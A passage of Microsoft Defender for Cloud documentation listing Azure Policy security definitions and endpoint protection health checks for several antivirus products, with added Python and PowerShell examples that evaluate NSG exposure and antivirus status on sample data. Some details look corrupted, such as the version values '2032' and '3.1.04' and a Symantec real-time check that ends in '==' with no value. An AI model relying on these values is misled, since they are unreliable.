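            verdicts.append({"id": r["id"], "state": "Compliant", "action": "none"})
        elif effect == "AuditIfNotExists":
            verdicts.append({"id": r["id"], "state": "NonCompliant", "action": "log only"})
        else:  # DeployIfNotExists: auto-deploys on create/update only; existing
            verdicts.append({"id": r["id"], "state": "NonCompliant",  # resources need a
                             "action": "remediation task required"})  # remediation task
    return verdicts


if __name__ == "__main__":
    for v in evaluate(SERVERS_PLAN_RULE, {"effect": "DeployIfNotExists"}, INVENTORY):
        print(v)
```

Switching the `effect` parameter between AuditIfNotExists and DeployIfNotExists changes only the action column of the verdicts, not which resources are non-compliant, which is why the "Configure ... to be enabled" rows and the "... should be enabled" rows in this table share the same description text.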


Name (Azure portal): Enable Microsoft Defender for Cloud on your subscription
Description: Identifies existing subscriptions that aren't monitored by Microsoft Defender for Cloud and protects them with Defender for Cloud's free features. Subscriptions already monitored will be considered compliant. To register newly created subscriptions, open the compliance tab, select the relevant non-compliant assignment, and create a remediation task.
Effect(s): deployIfNotExists
Version (GitHub): 1.0.1

Name (Azure portal): Enable Security Center's auto provisioning of the Log Analytics agent on your subscriptions with custom workspace.
Description: Allow Security Center to auto provision the Log Analytics agent on your subscriptions to monitor and collect security data using a custom workspace.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Enable Security Center's auto provisioning of the Log Analytics agent on your subscriptions with default workspace.
Description: Allow Security Center to auto provision the Log Analytics agent on your subscriptions to monitor and collect security data using the ASC default workspace.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Endpoint protection health issues should be resolved on your machines
Description: Resolve endpoint protection health issues on your virtual machines to protect them from the latest threats and vulnerabilities. Azure Security Center supported endpoint protection solutions are documented at https://docs.microsoft.com/azure/security-center/security-center-services?tabs=features-windows#supported-endpoint-protection-solutions. Endpoint protection assessment is documented at https://docs.microsoft.com/azure/security-center/security-center-endpoint-protection.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Endpoint protection should be installed on your machines
Description: To protect your machines from threats and vulnerabilities, install a supported endpoint protection solution.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Endpoint protection solution should be installed on virtual machine scale sets
Description: Audit the existence and health of an endpoint protection solution on your virtual machine scale sets, to protect them from threats and vulnerabilities.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): Guest accounts with owner permissions on Azure resources should be removed
Description: External accounts with owner permissions should be removed from your subscription in order to prevent unmonitored access.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Guest accounts with read permissions on Azure resources should be removed
Description: External accounts with read privileges should be removed from your subscription in order to prevent unmonitored access.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Guest accounts with write permissions on Azure resources should be removed
Description: External accounts with write privileges should be removed from your subscription in order to prevent unmonitored access.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Guest Configuration extension should be installed on your machines
Description: To ensure secure configurations of in-guest settings of your machine, install the Guest Configuration extension. In-guest settings that the extension monitors include the configuration of the operating system, application configuration or presence, and environment settings. Once installed, in-guest policies will be available such as 'Windows Exploit guard should be enabled'. Learn more at https://aka.ms/gcpol.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.3

Name (Azure portal): Internet-facing virtual machines should be protected with network security groups
Description: Protect your virtual machines from potential threats by restricting access to them with network security groups (NSG). Learn more about controlling traffic with NSGs at https://aka.ms/nsg-doc.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): IP Forwarding on your virtual machine should be disabled
Description: Enabling IP forwarding on a virtual machine's NIC allows the machine to receive traffic addressed to other destinations. IP forwarding is rarely required (e.g., when using the VM as a network virtual appliance), and therefore this should be reviewed by the network security team.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): Kubernetes Services should be upgraded to a non-vulnerable Kubernetes version
Description: Upgrade your Kubernetes service cluster to a later Kubernetes version to protect against known vulnerabilities in your current Kubernetes version. Vulnerability CVE-2019-9946 has been patched in Kubernetes versions 1.11.9+, 1.12.7+, 1.13.5+, and 1.14.0+.
Effect(s): Audit, Disabled
Version (GitHub): 1.0.2

Name (Azure portal): Log Analytics agent should be installed on your Cloud Services (extended support) role instances
Description: Security Center collects data from your Cloud Services (extended support) role instances to monitor for security vulnerabilities and threats.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 2.0.0

Name (Azure portal): Log Analytics agent should be installed on your virtual machine for Azure Security Center monitoring
Description: This policy audits any Windows/Linux virtual machines (VMs) on which the Log Analytics agent, which Security Center uses to monitor for security vulnerabilities and threats, is not installed.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Log Analytics agent should be installed on your virtual machine scale sets for Azure Security Center monitoring
Description: Security Center collects data from your Azure virtual machines (VMs) to monitor for security vulnerabilities and threats.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Machines should have secret findings resolved
Description: Audits virtual machines to detect whether they contain secret findings from the secret scanning solutions on your virtual machines.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.2

Name (Azure portal): Management ports of virtual machines should be protected with just-in-time network access control
Description: Possible network Just In Time (JIT) access will be monitored by Azure Security Center as recommendations.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): Management ports should be closed on your virtual machines
Description: Open remote management ports are exposing your VM to a high level of risk from Internet-based attacks. These attacks attempt to brute force credentials to gain admin access to the machine.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0
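Three rows in this table describe the same network exposure from different angles: "All network ports should be restricted on network security groups associated to your virtual machine" (inbound Allow rules from 'Any' or 'Internet'), "Management ports should be closed on your virtual machines", and the just-in-time row. The Python below is an added example, not Defender for Cloud's own assessment logic: it takes an NSG in the ARM securityRules layout (constructed sample data here, not a real NSG) and reports both the overly permissive rules and the management ports that are effectively reachable from the Internet once rule priority and explicit Deny rules are taken into account. The port list and the set of "Internet" source prefixes are this example's assumptions.

```python
from __future__ import annotations

from dataclasses import dataclass
from typing import Any, Iterable

# Management ports in the sense of "Management ports should be closed" (SSH, RDP,
# WinRM); which ports count is this example's assumption.
MANAGEMENT_PORTS = {22: "SSH", 3389: "RDP", 5985: "WinRM HTTP", 5986: "WinRM HTTPS"}
# Source prefixes that stand for "the whole Internet" in an NSG rule.
INTERNET_SOURCES = {"*", "any", "internet", "0.0.0.0/0"}

# Constructed sample NSG in the ARM securityRules layout (not real data).
SAMPLE_NSG: dict[str, Any] = {
    "name": "vm1-nsg",
    "properties": {"securityRules": [
        {"name": "allow-https", "properties": {"priority": 100, "direction": "Inbound",
         "access": "Allow", "protocol": "Tcp", "sourceAddressPrefix": "*",
         "destinationPortRange": "443"}},
        {"name": "allow-ssh-corp", "properties": {"priority": 110, "direction": "Inbound",
         "access": "Allow", "protocol": "Tcp", "sourceAddressPrefix": "203.0.113.0/24",
         "destinationPortRange": "22"}},
        {"name": "deny-rdp-internet", "properties": {"priority": 200, "direction": "Inbound",
         "access": "Deny", "protocol": "Tcp", "sourceAddressPrefix": "Internet",
         "destinationPortRange": "3389"}},
        {"name": "allow-mgmt-any", "properties": {"priority": 300, "direction": "Inbound",
         "access": "Allow", "protocol": "*", "sourceAddressPrefix": "*",
         "destinationPortRanges": ["22", "3389", "5985-5986"]}},
        {"name": "allow-all-out", "properties": {"priority": 100, "direction": "Outbound",
         "access": "Allow", "protocol": "*", "sourceAddressPrefix": "*",
         "destinationPortRange": "*"}},
    ]},
}


@dataclass(frozen=True)
class Rule:
    name: str
    priority: int
    direction: str
    access: str
    protocol: str
    sources: tuple[str, ...]
    dest_ports: tuple[str, ...]


def load_rules(nsg: dict[str, Any]) -> list[Rule]:
    """Flatten ARM securityRules; the plural *Prefixes/*Ranges forms win when present."""
    rules = []
    for r in nsg["properties"]["securityRules"]:
        p = r["properties"]
        sources = tuple(p.get("sourceAddressPrefixes") or [p["sourceAddressPrefix"]])
        ports = tuple(p.get("destinationPortRanges") or [p["destinationPortRange"]])
        rules.append(Rule(r["name"], int(p["priority"]), p["direction"], p["access"],
                          p["protocol"], sources, ports))
    return rules


def port_in_ranges(port: int, ranges: Iterable[str]) -> bool:
    """True if port falls in any range written as "*", "22" or "5985-5986"."""
    for rng in ranges:
        if rng == "*":
            return True
        lo, _, hi = rng.partition("-")
        if int(lo) <= port <= int(hi or lo):
            return True
    return False


def from_internet(rule: Rule) -> bool:
    return any(s.lower() in INTERNET_SOURCES for s in rule.sources)


def overly_permissive(rules: Iterable[Rule]) -> list[str]:
    """Inbound Allow rules open to 'Any'/'Internet': the condition behind
    "All network ports should be restricted ..."."""
    return sorted(r.name for r in rules
                  if r.direction == "Inbound" and r.access == "Allow" and from_internet(r))


def exposed_management_ports(rules: Iterable[Rule]) -> dict[int, str]:
    """Effective verdict per management port. Inbound rules are walked in priority
    order (lowest number first) and the first rule matching the port for Internet
    traffic decides, as the NSG itself would, so an explicit Deny closes the port
    even if a later Allow is wide open. Anything unmatched falls through to the
    built-in DenyAllInBound rule at priority 65500 and is closed."""
    inbound = sorted((r for r in rules if r.direction == "Inbound"), key=lambda r: r.priority)
    exposed: dict[int, str] = {}
    for port in MANAGEMENT_PORTS:
        for r in inbound:
            if r.protocol.lower() not in ("*", "tcp"):
                continue
            if not (port_in_ranges(port, r.dest_ports) and from_internet(r)):
                continue
            if r.access == "Allow":
                exposed[port] = r.name
            break
    return exposed


if __name__ == "__main__":
    rules = load_rules(SAMPLE_NSG)
    print("overly permissive inbound rules:", overly_permissive(rules))
    for port, rule in exposed_management_ports(rules).items():
        print(f"{MANAGEMENT_PORTS[port]} ({port}) reachable from the Internet via rule {rule}")
```

The priority walk is also what makes just-in-time access work: JIT keeps a Deny rule for the management ports in place and inserts a time-bound Allow for the requester's source address at a lower priority number, so the ports are closed to everyone else and the check above reports nothing exposed.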


Name (Azure portal): Microsoft Defender CSPM should be enabled
Description: Defender Cloud Security Posture Management (CSPM) provides enhanced posture capabilities and a new intelligent cloud security graph to help identify, prioritize, and reduce risk. Defender CSPM is available in addition to the free foundational security posture capabilities turned on by default in Defender for Cloud.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Microsoft Defender for Azure Cosmos DB should be enabled
Description: Microsoft Defender for Azure Cosmos DB is an Azure-native layer of security that detects attempts to exploit databases in your Azure Cosmos DB accounts. Defender for Azure Cosmos DB detects potential SQL injections, known bad actors based on Microsoft Threat Intelligence, suspicious access patterns, and potential exploitations of your database through compromised identities or malicious insiders.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Microsoft Defender for Containers should be enabled
Description: Microsoft Defender for Containers provides hardening, vulnerability assessment and run-time protections for your Azure, hybrid, and multi-cloud Kubernetes environments.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Microsoft Defender for SQL should be enabled for unprotected Synapse workspaces
Description: Enable Defender for SQL to protect your Synapse workspaces. Defender for SQL monitors your Synapse SQL to detect anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Microsoft Defender for SQL status should be protected for Arc-enabled SQL Servers
Description: Microsoft Defender for SQL provides functionality for surfacing and mitigating potential database vulnerabilities, detecting anomalous activities that could indicate threats to SQL databases, and discovering and classifying sensitive data. Once enabled, the protection status indicates that the resource is actively monitored. Even when Defender is enabled, multiple configuration settings should be validated on the agent, machine, workspace and SQL server to ensure active protection.
Effect(s): Audit, Disabled
Version (GitHub): 1.0.1

Name (Azure portal): Microsoft Defender for Storage (Classic) should be enabled
Description: Microsoft Defender for Storage (Classic) provides detections of unusual and potentially harmful attempts to access or exploit storage accounts.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.4

Name (Azure portal): Microsoft Defender for Storage should be enabled
Description: Microsoft Defender for Storage detects potential threats to your storage accounts. It helps prevent the three major impacts on your data and workload: malicious file uploads, sensitive data exfiltration, and data corruption. The new Defender for Storage plan includes Malware Scanning and Sensitive Data Threat Detection. This plan also provides a predictable pricing structure (per storage account) for control over coverage and costs.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Monitor missing Endpoint Protection in Azure Security Center
Description: Servers without an installed Endpoint Protection agent will be monitored by Azure Security Center as recommendations.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): Non-internet-facing virtual machines should be protected with network security groups
Description: Protect your non-internet-facing virtual machines from potential threats by restricting access with network security groups (NSG). Learn more about controlling traffic with NSGs at https://aka.ms/nsg-doc.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0


Name (Azure portal): Running container images should have vulnerability findings resolved
Description: Container image vulnerability assessment scans container images running on your Kubernetes clusters for security vulnerabilities and exposes detailed findings for each image. Resolving the vulnerabilities can greatly improve your containers' security posture and protect them from attacks.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.2

Name (Azure portal): Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management)
Description: Container image vulnerability assessment scans your registry for commonly known vulnerabilities (CVEs) and provides a detailed vulnerability report for each image. This recommendation provides visibility to vulnerable images currently running in your Kubernetes clusters. Remediating vulnerabilities in container images that are currently running is key to improving your security posture, significantly reducing the attack surface for your containerized workloads.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Security Center standard pricing tier should be selected
Description: The standard pricing tier enables threat detection for networks and virtual machines, providing threat intelligence, anomaly detection, and behavior analytics in Azure Security Center.
Effect(s): Audit, Disabled
Version (GitHub): 1.1.0

Name (Azure portal): Setup subscriptions to transition to an alternative vulnerability assessment solution
Description: Microsoft Defender for Cloud offers vulnerability scanning for your machines at no extra cost. Enabling this policy will cause Defender for Cloud to automatically propagate the findings from the built-in Microsoft Defender Vulnerability Management solution to all supported machines.
Effect(s): DeployIfNotExists, Disabled
Version (GitHub): 1.0.0-preview

Name (Azure portal): SQL databases should have vulnerability findings resolved
Description: Monitor vulnerability assessment scan results and recommendations for how to remediate database vulnerabilities.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 4.1.0

Name (Azure portal): SQL servers on machines should have vulnerability findings resolved
Description: SQL vulnerability assessment scans your database for security vulnerabilities, and exposes any deviations from best practices such as misconfigurations, excessive permissions, and unprotected sensitive data. Resolving the vulnerabilities found can greatly improve your database security posture.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.0

Name (Azure portal): Subnets should be associated with a Network Security Group
Description: Protect your subnet from potential threats by restricting access to it with a Network Security Group (NSG). NSGs contain a list of Access Control List (ACL) rules that allow or deny network traffic to your subnet.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): Subscriptions should have a contact email address for security issues
Description: To ensure the relevant people in your organization are notified when there is a potential security breach in one of your subscriptions, set a security contact to receive email notifications from Security Center.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.1

Name (Azure portal): System updates on virtual machine scale sets should be installed
Description: Audit whether there are any missing system security updates and critical updates that should be installed to ensure that your Windows and Linux virtual machine scale sets are secure.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): System updates should be installed on your machines
Description: Missing security system updates on your servers will be monitored by Azure Security Center as recommendations.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 4.0.0


Name (Azure portal): There should be more than one owner assigned to your subscription
Description: It is recommended to designate more than one subscription owner in order to have administrator access redundancy.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): Virtual machines should encrypt temp disks, caches, and data flows between Compute and Storage resources
Description: By default, a virtual machine's OS and data disks are encrypted-at-rest using platform-managed keys. Temp disks, data caches and data flowing between compute and storage aren't encrypted. Disregard this recommendation if: 1. using encryption-at-host, or 2. server-side encryption on Managed Disks meets your security requirements. Learn more in: Server-side encryption of Azure Disk Storage: https://aka.ms/disksse, Different disk encryption offerings: https://aka.ms/diskencryptioncomparison
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 2032

Name (Azure portal): Virtual machines' Guest Configuration extension should be deployed with system-assigned managed identity
Description: The Guest Configuration extension requires a system assigned managed identity. Azure virtual machines in the scope of this policy will be non-compliant when they have the Guest Configuration extension installed but do not have a system assigned managed identity. Learn more at https://aka.ms/gcpol
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 1.0.1

Name (Azure portal): Vulnerabilities in container security configurations should be remediated
Description: Audit vulnerabilities in security configuration on machines with Docker installed and display as recommendations in Azure Security Center.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Name (Azure portal): Vulnerabilities in security configuration on your machines should be remediated
Description: Servers which do not satisfy the configured baseline will be monitored by Azure Security Center as recommendations.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.1.04

Name (Azure portal): Vulnerabilities in security configuration on your virtual machine scale sets should be remediated
Description: Audit the OS vulnerabilities on your virtual machine scale sets to protect them from attacks.
Effect(s): AuditIfNotExists, Disabled
Version (GitHub): 3.0.0

Next steps

In this article, you learned about Azure Policy security policy definitions in Defender for Cloud. To learn more about initiatives, policies, and how they relate to Defender for Cloud's recommendations, see What are security policies, initiatives, and recommendations?


Endpoint protection assessment and recommendations in Microsoft Defender for Cloud

Article • 08/30/2023

Note

As the Log Analytics agent (also known as MMA) is set to retire in August 2024, all Defender for Servers features that currently depend on it, including those described on this page, will be available through either Microsoft Defender for Endpoint integration or agentless scanning, before the retirement date. For more information about the roadmap for each of the features that currently rely on the Log Analytics agent, see this announcement.

Microsoft Defender for Cloud provides health assessments of supported versions of Endpoint protection solutions. This article explains the scenarios that lead Defender for Cloud to generate the following two recommendations:

- Endpoint protection should be installed on your machines
- Endpoint protection health issues should be resolved on your machines


Tip

At the end of 2021, we revised the recommendation that installs endpoint protection. One of the changes affects how the recommendation displays machines that are powered off. In the previous version, machines that were turned off appeared in the 'Not applicable' list. In the newer recommendation, they don't appear in any of the resources lists (healthy, unhealthy, or not applicable).


Windows Defender

- Defender for Cloud recommends Endpoint protection should be installed on your machines when Get-MpComputerStatus runs and the result is AMServiceEnabled: False

- Defender for Cloud recommends Endpoint protection health issues should be resolved on your machines when Get-MpComputerStatus runs and any of the following occurs:

  - Any of the following properties are false:
    - AMServiceEnabled
    - AntispywareEnabled
    - RealTimeProtectionEnabled
    - BehaviorMonitorEnabled
    - IoavProtectionEnabled
    - OnAccessProtectionEnabled

  - One or both of the following properties are 7 or more:
    - AntispywareSignatureAge
    - AntivirusSignatureAge


Microsoft System Center endpoint protection

- Defender for Cloud recommends Endpoint protection should be installed on your machines when importing SCEPMpModule ("$env:ProgramFiles\Microsoft Security Client\MpProvider\MpProvider.psd1") and running Get-MProtComputerStatus results in AMServiceEnabled = false.

- Defender for Cloud recommends Endpoint protection health issues should be resolved on your machines when Get-MProtComputerStatus runs and any of the following occurs:

  - At least one of the following properties is false:
    - AMServiceEnabled
    - AntispywareEnabled
    - RealTimeProtectionEnabled
    - BehaviorMonitorEnabled
    - IoavProtectionEnabled
    - OnAccessProtectionEnabled

  - One or both of the following Signature Updates are greater than or equal to 7:
    - AntispywareSignatureAge
    - AntivirusSignatureAge
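The Windows Defender and System Center Endpoint Protection rules above apply the same criteria to the same property names, so here is one added PowerShell example (not Microsoft's code, and not part of the original article) that evaluates a status object against those criteria and returns the recommendation(s) the article says Defender for Cloud would raise. The function name Get-EndpointProtectionAssessment is my own, and the status object is constructed inline so the script runs offline; on a live machine you would pass the real output of Get-MpComputerStatus or Get-MProtComputerStatus instead.

```powershell
# Added example: reproduce the endpoint protection health logic described in the article.
# Not Microsoft code; the function name and the sample status object are constructed here.

function Get-EndpointProtectionAssessment {
    param(
        # Output of Get-MpComputerStatus (Windows Defender) or Get-MProtComputerStatus (SCEP)
        [Parameter(Mandatory)] $Status,
        # The article: a signature age of 7 days or more is a health issue
        [int] $MaxSignatureAgeDays = 7
    )

    $findings = [System.Collections.Generic.List[string]]::new()

    # Rule 1: AMServiceEnabled false -> "Endpoint protection should be installed on your machines"
    if (-not $Status.AMServiceEnabled) {
        $findings.Add('Endpoint protection should be installed on your machines (AMServiceEnabled = False)')
    }

    # Rule 2a: any of these properties false -> health issue
    $requiredTrue = 'AMServiceEnabled', 'AntispywareEnabled', 'RealTimeProtectionEnabled',
                    'BehaviorMonitorEnabled', 'IoavProtectionEnabled', 'OnAccessProtectionEnabled'
    $disabled = @($requiredTrue | Where-Object { -not $Status.$_ })

    # Rule 2b: either signature age at or above the threshold -> health issue
    $ageProps = 'AntispywareSignatureAge', 'AntivirusSignatureAge'
    $stale = @($ageProps | Where-Object { [int]($Status.$_) -ge $MaxSignatureAgeDays })

    if ($disabled.Count -gt 0 -or $stale.Count -gt 0) {
        $detail = @()
        if ($disabled.Count -gt 0) { $detail += 'disabled: ' + ($disabled -join ', ') }
        if ($stale.Count -gt 0) {
            $ages = $stale | ForEach-Object { '{0}={1} days' -f $_, $Status.$_ }
            $detail += 'stale signatures: ' + ($ages -join ', ')
        }
        $findings.Add('Endpoint protection health issues should be resolved on your machines (' + ($detail -join '; ') + ')')
    }

    if ($findings.Count -eq 0) {
        $findings.Add('Healthy: no endpoint protection recommendation would be raised')
    }
    return $findings
}

# Constructed sample: real-time protection off and antivirus signatures 9 days old,
# which should trigger the "health issues should be resolved" recommendation only.
$sample = [pscustomobject]@{
    AMServiceEnabled          = $true
    AntispywareEnabled        = $true
    RealTimeProtectionEnabled = $false
    BehaviorMonitorEnabled    = $true
    IoavProtectionEnabled     = $true
    OnAccessProtectionEnabled = $true
    AntispywareSignatureAge   = 2
    AntivirusSignatureAge     = 9
}
Get-EndpointProtectionAssessment -Status $sample

# On a live machine (Windows Defender):
#   Get-EndpointProtectionAssessment -Status (Get-MpComputerStatus)
# For System Center Endpoint Protection, import the module first as the article describes:
#   Import-Module "$env:ProgramFiles\Microsoft Security Client\MpProvider\MpProvider.psd1"
#   Get-EndpointProtectionAssessment -Status (Get-MProtComputerStatus)
```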


Trend Micro

- Defender for Cloud recommends Endpoint protection should be installed on your machines when any of the following checks aren't met:
  - HKLM:\SOFTWARE\TrendMicro\Deep Security Agent exists
  - HKLM:\SOFTWARE\TrendMicro\Deep Security Agent\InstallationFolder exists
  - The dsa_query.cmd file is found in the Installation Folder
  - Running dsa_query.cmd results with Component.AM.mode: on - Trend Micro Deep Security Agent detected


Symantec endpoint protection

Defender for Cloud recommends Endpoint protection should be installed on your machines when any of the following checks aren't met:

- HKLM:\Software\Symantec\Symantec Endpoint Protection\CurrentVersion\PRODUCTNAME = "Symantec Endpoint Protection"
- HKLM:\Software\Symantec\Symantec Endpoint Protection\CurrentVersion\public-opstate\ASRunningStatus = 1

- HKLM:\Software\Wow6432Node\Symantec\Symantec Endpoint Protection\CurrentVersion\PRODUCTNAME = "Symantec Endpoint Protection"
- HKLM:\Software\Wow6432Node\Symantec\Symantec Endpoint Protection\CurrentVersion\public-opstate\ASRunningStatus = 1

Defender for Cloud recommends Endpoint protection health issues should be resolved on your machines when any of the following checks aren't met:

- Check Symantec Version >= 12: Registry location: HKLM:\Software\Symantec\Symantec Endpoint Protection\CurrentVersion - Value "PRODUCTVERSION"
- Check Real-Time Protection status: HKLM:\Software\Wow6432Node\Symantec\Symantec Endpoint Protection\AV\Storages\Filesystem\RealTimeScan\OnOff ==
- Check Signature Update status: HKLM:\Software\Symantec\Symantec Endpoint Protection\CurrentVersion\public-opstate\LatestVirusDefsDate <= 7 days
- Check Full Scan status: HKLM:\Software\Symantec\Symantec Endpoint Protection\CurrentVersion\public-opstate\LastSuccessfulScanDateTime <= 7 days
- Find signature version number. Path to signature version for Symantec 12: Registry Paths + "CurrentVersion\SharedDefs" -Value "SRTSP"
- Path to signature version for Symantec 14: Registry Paths + "CurrentVersion\SharedDefs\SDSDefs" -Value "SRTSP"

Registry Paths:

- "HKLM:\Software\Symantec\Symantec Endpoint Protection" + $Path
- "HKLM:\Software\Wow6432Node\Symantec\Symantec Endpoint Protection" + $Path


McAfee endpoint protection for Windows

Defender for Cloud recommends Endpoint protection should be installed on your machines when any of the following checks aren't met:

- HKLM:\SOFTWARE\McAfee\Endpoint\AV\ProductVersion exists
- HKLM:\SOFTWARE\McAfee\AVSolution\MCSHIELDGLOBAL\GLOBAL\enableoas = 1

Defender for Cloud recommends Endpoint protection health issues should be resolved on your machines when any of the following checks aren't met:

- McAfee Version: HKLM:\SOFTWARE\McAfee\Endpoint\AV\ProductVersion >= 10
- Find Signature Version: HKLM:\Software\McAfee\AVSolution\DS\DS -Value "dwContentMajorVersion"
- Find Signature date: HKLM:\Software\McAfee\AVSolution\DS\DS -Value "szContentCreationDate" >= 7 days
- Find Scan date: HKLM:\Software\McAfee\Endpoint\AV\ODS -Value "LastFullScanOdsRunTime" >= 7 days


McAfee Endpoint Security for Linux Threat Prevention

Defender for Cloud recommends Endpoint protection should be installed on your machines when any of the following checks aren't met:

- File /opt/McAfee/ens/tp/bin/mfetpcli exists
- "/opt/McAfee/ens/tp/bin/mfetpcli --version" output is: McAfee name = McAfee Endpoint Security for Linux Threat Prevention and McAfee version >= 10

Defender for Cloud recommends Endpoint protection health issues should be resolved on your machines when any of the following checks aren't met:

- "/opt/McAfee/ens/tp/bin/mfetpcli --listtask" returns Quick scan, Full scan and both of the scans <= 7 days
- "/opt/McAfee/ens/tp/bin/mfetpcli --listtask" returns DAT and engine Update time and both of them <= 7 days
- "/opt/McAfee/ens/tp/bin/mfetpcli --getoasconfig --summary" returns On Access Scan status


Sophos Antivirus for Linux

Defender for Cloud recommends Endpoint protection should be installed on your machines when any of the following checks aren't met:

- File /opt/sophos-av/bin/savdstatus exists, or search for a customized location with "readlink $(which savscan)"
- "/opt/sophos-av/bin/savdstatus --version" returns Sophos name = Sophos Anti-Virus and Sophos version >= 9

Defender for Cloud recommends Endpoint protection health issues should be resolved on your machines when any of the following checks aren't met:

- "/opt/sophos-av/bin/savlog --maxage=7 | grep -i "Scheduled scan .* completed" | tail -1" returns a value
- "/opt/sophos-av/bin/savlog --maxage=7 | grep "scan finished" | tail -1" returns a value
- "/opt/sophos-av/bin/savdstatus --lastupdate" returns lastUpdate, which should be <= 7 days
- "/opt/sophos-av/bin/savdstatus -v" is equal to "On-access scanning is running"
- "/opt/sophos-av/bin/savconfig get LiveProtection" returns enabled


Troubleshoot and support

Troubleshoot

Microsoft Antimalware extension logs are available at: %Systemdrive%\WindowsAzure\Logs\Plugins\Microsoft.Azure.Security.IaaSAntimalware (or PaaSAntimalware)\1.5.5.x (version#)\CommandExecution.log

Support

For more help, contact the Azure experts on the MSDN Azure and Stack Overflow forums, or file an Azure support incident. Go to the Azure support site and select Get support. For information about using Azure Support, read the Microsoft Azure support common questions.


az security

Reference

Manage your security posture with Microsoft Defender for Cloud.

Commands

Name | Description | Type | Status
az security adaptive-application-controls | Enable control which applications can run on your Azure and non-Azure machines (Windows and Linux). | Core | GA
az security adaptive-application-controls list | Adaptive Application Controls - List. | Core | GA
az security adaptive-application-controls show | Adaptive Application Controls - Get. | Core | GA
az security adaptive_network_hardenings | View all Adaptive Network Hardening resources. | Core | GA
az security adaptive_network_hardenings list | Gets a list of Adaptive Network Hardenings resources in scope of an extended resource. | Core | GA
az security adaptive_network_hardenings show | Gets a single Adaptive Network Hardening resource. | Core | GA
az security alert | View security alerts. | Core | GA
az security alert list | List security alerts. | Core | GA
az security alert show | Shows a security alert. | Core | GA
az security alert update | Updates a security alert status. | Core | GA
az security alerts-suppression-rule | View and manage alerts suppression rules. | Core | GA
az security alerts-suppression-rule delete | Delete an alerts suppression rule. | Core | GA
az security alerts-suppression-rule delete_scope | Delete an alerts suppression rule scope. | Core | GA
az security alerts-suppression-rule list | List all alerts suppression rules on a subscription scope. | Core | GA


Name | Description | Type | Status
az security alerts-suppression-rule show | Shows an alerts suppression rule. | Core | GA
az security alerts-suppression-rule update | Updates or creates an alerts suppression rule. | Core | GA
az security alerts-suppression-rule upsert_scope | Update an alerts suppression rule with scope element. | Core | GA
az security allowed_connections | View all possible traffic between resources for the subscription and location, based on connection type. | Core | GA
az security allowed_connections list | List of all possible traffic between resources for the subscription. | Core | GA
az security allowed_connections show | List all possible traffic between resources for the subscription and location, based on connection type. | Core | GA
az security assessment | View your security assessment results. | Core | GA
az security assessment-metadata | View your security assessment metadata. | Core | GA
az security assessment-metadata create | Creates a customer managed security assessment type. | Core | GA
az security assessment-metadata delete | Deletes a security assessment type and all its assessment results. | Core | GA
az security assessment-metadata list | List all security assessment results. | Core | GA
az security assessment-metadata show | Shows a security assessment. | Core | GA
az security assessment create | Creates a customer managed security assessment. | Core | GA
az security assessment delete | Deletes a security assessment. | Core | GA
az security assessment list | List all security assessment results. | Core | GA
az security assessment show | Shows a security assessment. | Core | GA
az security atp | View and manage Advanced Threat Protection settings. | Core | GA
az security atp cosmosdb | View and manage Advanced Threat Protection settings for Cosmos DB accounts. | Core | GA


Name | Description | Type | Status
az security atp cosmosdb show | Display Advanced Threat Protection settings for an Azure Cosmos DB account. | Core | GA
az security atp cosmosdb update | Toggle status of Advanced Threat Protection for an Azure Cosmos DB account. | Core | GA
az security atp storage | View and manage Advanced Threat Protection settings for storage accounts. | Core | GA
az security atp storage show | Display Advanced Threat Protection settings for a storage account. | Core | GA
az security atp storage update | Toggle status of Advanced Threat Protection for a storage account. | Core | GA
az security auto-provisioning-setting | View your auto provisioning settings. | Core | GA
